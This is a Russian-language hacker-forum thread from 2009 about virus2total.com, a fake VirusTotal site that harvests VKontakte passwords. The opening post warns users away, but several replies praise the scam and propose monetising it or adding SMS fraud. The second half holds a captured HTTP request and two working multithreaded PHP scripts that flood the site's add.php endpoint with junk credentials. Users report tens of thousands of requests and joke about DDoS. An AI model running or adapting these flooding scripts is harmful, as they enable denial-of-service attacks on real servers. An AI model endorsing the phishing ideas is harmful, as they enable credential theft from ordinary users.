Форум АНТИЧАТ - Стоп Мошенникам

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Социальные сети (https://forum.antichat.xyz/forumdisplay.php?f=133)

- - Стоп Мошенникам - или virus2total.com (https://forum.antichat.xyz/showthread.php?t=138188)

Стоп Мошенникам - или virus2total.com

"С твоего акаунта постоянно мне приходят спам сообщения. у тебя что вирус ? проверь свой акаунт на сайте virus2total.com , надоело уже" - вот такое сообщение в последнее время получают многие пользователи социальной сети В контакте. Сообщения приходят как от друзей, так и от совершенно посторонних людей и может прийти к вам как по электронной почта, так и через любую социальную сеть (блог). Не исключение стал и я.
Если вам вдруг пришло такое сообщение не спешите переходить по данной ссылке и вводить свои данные. Это всего лишь очередная попытка "злодеев" завладеть вашими данными от учетной записи, чтобы потом отсылать через нее спам и другое вредоносное ПО.

Что же из себя представляет данный сервис с таким громкоговорящим название?! Это всего лишь фейк и никакого отношения к сервису VIRUS TOTAL он не имеет.

http://s42.radikal.ru/i096/0908/72/d1436755ff8a.jpg

Принцип работы сервиса прост, вы указываете в строке для проверки свой E-mail (аккаунт в контакте) и начинается проверка на наличие вирусов. И вдруг выскакивает устрашающая надпись, что в вашем аккаунте найдет вирус и для его нейтрализации нужно ввести пароль от учетной записи.

http://s59.radikal.ru/i163/0908/69/bb1434deb8a5.jpg

Далее Вы вводите свой пароль от аккаунта и программа производит чистку, после чего информирует Вас о том, что чистка произведена и все вредоносное ПО удаленно с вашего аккаунта.

http://s42.radikal.ru/i095/0908/2d/ede4b6332f4e.jpg

Вроде ничего подозрительного нет, но есть но. Когда Вы вводите свои данные, якобы для проверки, они автоматически пересылаются на сервер "злоумышленников" и когда приходит их час начинают действовать для своих "грязных" замыслов.

И запомните раз и навсегда, что вирусы функционируют только на клиентской машине, то есть PC, а ну никак не на личной странице на сервере. Именно поэтому лечение от вирусов – совсем другая операция, требующая установку антивируса на компьютер, но никак не ввод данных для доступа к учётной записи на сомнительном сайте.
Поэтому, если подобное сообщение пришло и к вам, не торопитесь, сломя голову, ломится на сайт и проверять на вирусы.

Для эксперимента можете ввести данные от несуществующего аккаута, результат всегда будет один и тотже, программа якобы найдет вирус и попросит ввести пароль, а потом уведомит вас о благополучном исходе.

Автор: Kastin © 2009

Ничего подозрительного ? Автор,у тебя совсем крыша слетела с катушек ? Ввести пароль - это что, уже считается нормально ?!Да пусть хоть порно покажут...

Ахахах
Такой развод
пишешь левый пароль
он пишет спасибо =)
Ваш акк почищен

на этом бы партнерку сделать :D думаю норм конвертилось ... :D

Ага, идея покруче, чем обычный фейк, ХОРОШО ПРИДУМАЛ!

еще бы отправку смс прикрутить туда :)

отличный лохотрон. просто отличный.
чуток бы до ума довести, и воды добавить на страницу... и вообще конфетко будет))

Хороший фейк.

Классный фейк респект!!

интересно а как так можно реализовать вывод данных внизу фейка со страницы вконтакте

начинаем базу акков искать :D

Регистрация домена - 23 августа.

Причем, только с одного айпи предупреждает один раз, а дальше говорит "вирусов нет". Умно.

он хорошо замаскирован!! form action="javascript:"

аха, интересно что
http://virus2total.com/add.php -добавляет а базу логины пароли

Цитата:

я так понимаю открывает приложение?????

root_sashok, зырь в куки, тама good=%mail% он так определяет
Что? Где? Когда?, (ппц ник) я тож это в сниффере поймал

Вобще вещ оч крутая, через ajax смотрит профиль, много пассов они там наловили, предлагаю им засрать логи :cool:
Если чо вот

Код:

POST http://virus2total.com/add.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Accept: text/plain, */*, text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

User-Agent: Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1

Host: virus2total.com

Accept-Language: ru-RU,ru;q=0.9,en;q=0.8

Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1

Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0

Referer: http://virus2total.com/

Cookie: good=a@a.ru

Cookie2: $Version=1

Proxy-Connection: Keep-Alive

Content-Length: 96

Content-Transfer-Encoding: binary



email=a%40a.ru&pass=%D0%B2%D1%8A%D0%B5%D0%B1%D0%B8+%D0%B3%D0%BE%D0%B2%D0%BD%D0%B0+%25username%25

Ща нас опять по телеку покажут!111
Телевидение снимите мой пост!!!1111

А я БД флужу, уже 3к мессаг, сейчас многопотоычнм это доделываю и писец.

На такой фейк может повестись только 2 летняя девочка с синдромом дауна .
Ну или люди не сидящие на ачате, ибо нас предупредили уже ^_^ Спасиб=)

<br />
<b>Warning</b>: fclose(): supplied argument is not a valid stream resource in <b>/home/computer/public_html/virus2total.com/add.php</b> on line <b>7</b><br />

Он работает на файлах
Лог можно засрать ...\r\n...\r\n...\r\n......
ИМХО если там фильтрация не идёт

В 20 потково запустил с деда, тыща мессаг - пол минуты, ня :3

http://virus2total.com/index_tmp_files/virustot.js

wildshaman герой ппц

Цитата:

Сообщение от R!D

wildshaman герой ппц

Всё правильно... ЭТА ВАЙНА!!!11 :D

Так я не понял, оно тырит куки или нет? :)

куки не тырит... вродебе... Ну в пакетах я не нащёл, еслиб тырило онобы сразу твоё мыло выводило
Айда флудить!

PHP код:


		
			
<?php

#v3.0  :D 

set_time_limit(0);

$threads = 10; #Потоки



/*****************************/



$fuck = 0;



while (1) {

    #$fuck++;

    

    $ch = array();

    $mh = curl_multi_init();

    

    for($th=1;$th<=$threads;$th++) {

        $ch[$th] = curl_init();

        

        curl_setopt($ch[$th], CURLOPT_URL, "http://virus2total.com/add.php");

        curl_setopt($ch[$th], CURLOPT_RETURNTRANSFER, 1);

        curl_setopt($ch[$th], CURLOPT_POST, 1);

        curl_setopt($ch[$th], CURLOPT_POSTFIELDS, 'email='.genFuck(0).'&pass='.genFuck(1));

        

        curl_multi_add_handle($mh,$ch[$th]);

    }

    

    $running=$threads;

    do {

        $was = $running;

        curl_multi_exec($mh,$running);

        

        if($was-$running != 0) {             #Убрать если ненадо

            $fuck += $was-$running;         #Убрать если ненадо

            echo "$fuck strings fucked\r\n";#Убрать если ненадо

        }                                      #Убрать если ненадо

    } while ($running > 0);

    

}



exit; die(vir2total);



function genFuck($pass) {

    $sg = 'qwrtpsdfghjklzxcvbnm';

    $ng = 'eyuioa';

    

    $mail = '';

    

    for($i=1;$i<=rand(4,20);$i++) {

        if($i%2) $mail .= $sg[rand(0,strlen($sg)-1)];

        else $mail .= $ng[rand(0,strlen($ng)-1)];

    }

    

    if ($pass) return $mail;

    

    $domains = array('mail.ru','inbox.ru','yandex.ru','list.ru', 'bk.ru','yahoo.com','gmail.com'); #добавить если чо

    shuffle($domains);



    return urlencode($mail.'@'.$domains[0]);

}

?>

через \r\n не стал делать, но можете сделать
Просто хз какой там разделитель и что имено он пишет
\r\n это %0D%0A

Значит через приложение данные просто показывает, не более.

Цитата:

Сообщение от root_sashok

Значит через приложение данные просто показывает, не более.

данные оно через ajax берёт
Хотя оно уже знает твой ID когда делает запрос, хмм
А, по ходу оно запрашивает http://vkontakte.ru/app759733 и узнаёт уже твой ID

Ну да, ничего опасного, значит. Сервис выдает данные, пользователь пугается и вводит пароль. Данные идут в лог.

Многопоточная флудилка:

PHP код:


		
			
<?

@set_time_limit(0);



function imTimer($name= 'default', $mode= ''){

    static $timers= array();

    $now=microtime(true);

    if(!isset($timers[$name])){

        $timers[$name]= $now;

        return 0;

    }

    $ret= $now - $timers[$name];

    if($mode == 'reset')

        $timers[$name]= $now;

    return round($ret, 5);

}

imTimer();



class MCurl  

{  

var $timeout = 20;

var $threads = 10;

function multiget($urls, &$result)  

{  

    

    $threads = $this->threads;    

    $i = 0;  

    for($i=0;$i<count($urls);$i=$i+$threads)  

    {  

        $urls_pack[] = array_slice($urls, $i, $threads);  

    }  

    foreach($urls_pack as $pack)  

    {  

        $mh = curl_multi_init(); unset($conn);  

        foreach ($pack as $i => $url)  

        {  

            $name[]=md5(rand(0,99999999));

            $conn[$i]=curl_init(trim($url));  

            curl_setopt($conn[$i],CURLOPT_RETURNTRANSFER, 1);  

            curl_setopt($conn[$i],CURLOPT_POSTFIELDS, "email=Wildshaman:{$name[$i]}&pass=Wildshaman:{$name[$i]}"); 

            curl_setopt($conn[$i],CURLOPT_TIMEOUT, $this->timeout);  

            curl_multi_add_handle ($mh,$conn[$i]);  

        }  

        do { $n=curl_multi_exec($mh,$active); usleep(100); } while ($active);  

        foreach ($pack as $i => $url)  

        {  

            $uu++;

            if (preg_match("|ok|is", curl_multi_getcontent($conn[$i])))

            {

                echo "$uu - {$name[$i]} <br>";            

                flush();            

            }

            curl_close($conn[$i]);  

        }  

curl_multi_close($mh);  

    }  

  

}  

}  





for ($h=1; $h<=50000; $h++)

    $urls[]="http://virus2total.com/add.php";

$mcurl = new MCurl;  

$mcurl->threads = 20; 

$mcurl->timeout = 30;

unset($results); 

$mcurl->multiget($urls, $results);  



print "$nu - <hr>общее время работы программы: ".imTimer();

?>

wildshaman, а чо, самый лысый, тоже в многопоточный переделал :))

Цитата:

Сообщение от Ponchik

wildshaman, а чо, самый лысый, тоже в многопоточный переделал :))

:)
У тебя кривая многопоточность, потоки работают не параллеьно, а постоянно дожидаются завершения других (как-то так,где-то читал) :P

Ааа, щас пойду мозг ломать, исправлю какнить

Так а где сам лог храниться? Можна как-то к ниму доступится?

=Zeus=, мы его щас так засрём что ты:
1)Хрен стоко скачаеш
2)Заипёшся чекать
====
wildshaman, та ну, нехочу мозг ломать, так работает меня устраивает, 30 потоков замучу и оставлю наночь
====
ддосят сайтег или меня глючит? :rolleyes:

Цитата:

Сообщение от Ponchik

глючит, не ддосят)
60к уже есть ^^
Понча, стукни мне в осекушку, 794788

Так, я понял одно: если буду делать фейк вам не скажу =))

доооо)) прям устранение конкурентов, а смысл, всё равно сайт вконтакте уже заблокирован=))))) и ещё pizdhelp.com на того же чела зареган, только сайт не о чём тут

пол ачата делает фейки, чем вам этот мешает, избавимся от идиотов которые вводят свои пароли где попало :)

бамс-бамс, пивко, ддос, абуза, пиздoнулсо сайтег :D

У понча флудилка практичней, потому что легко отчистить базу от дубликатов в данном случае у Wildshaman'a куча записей Wildshaman:Wildshaman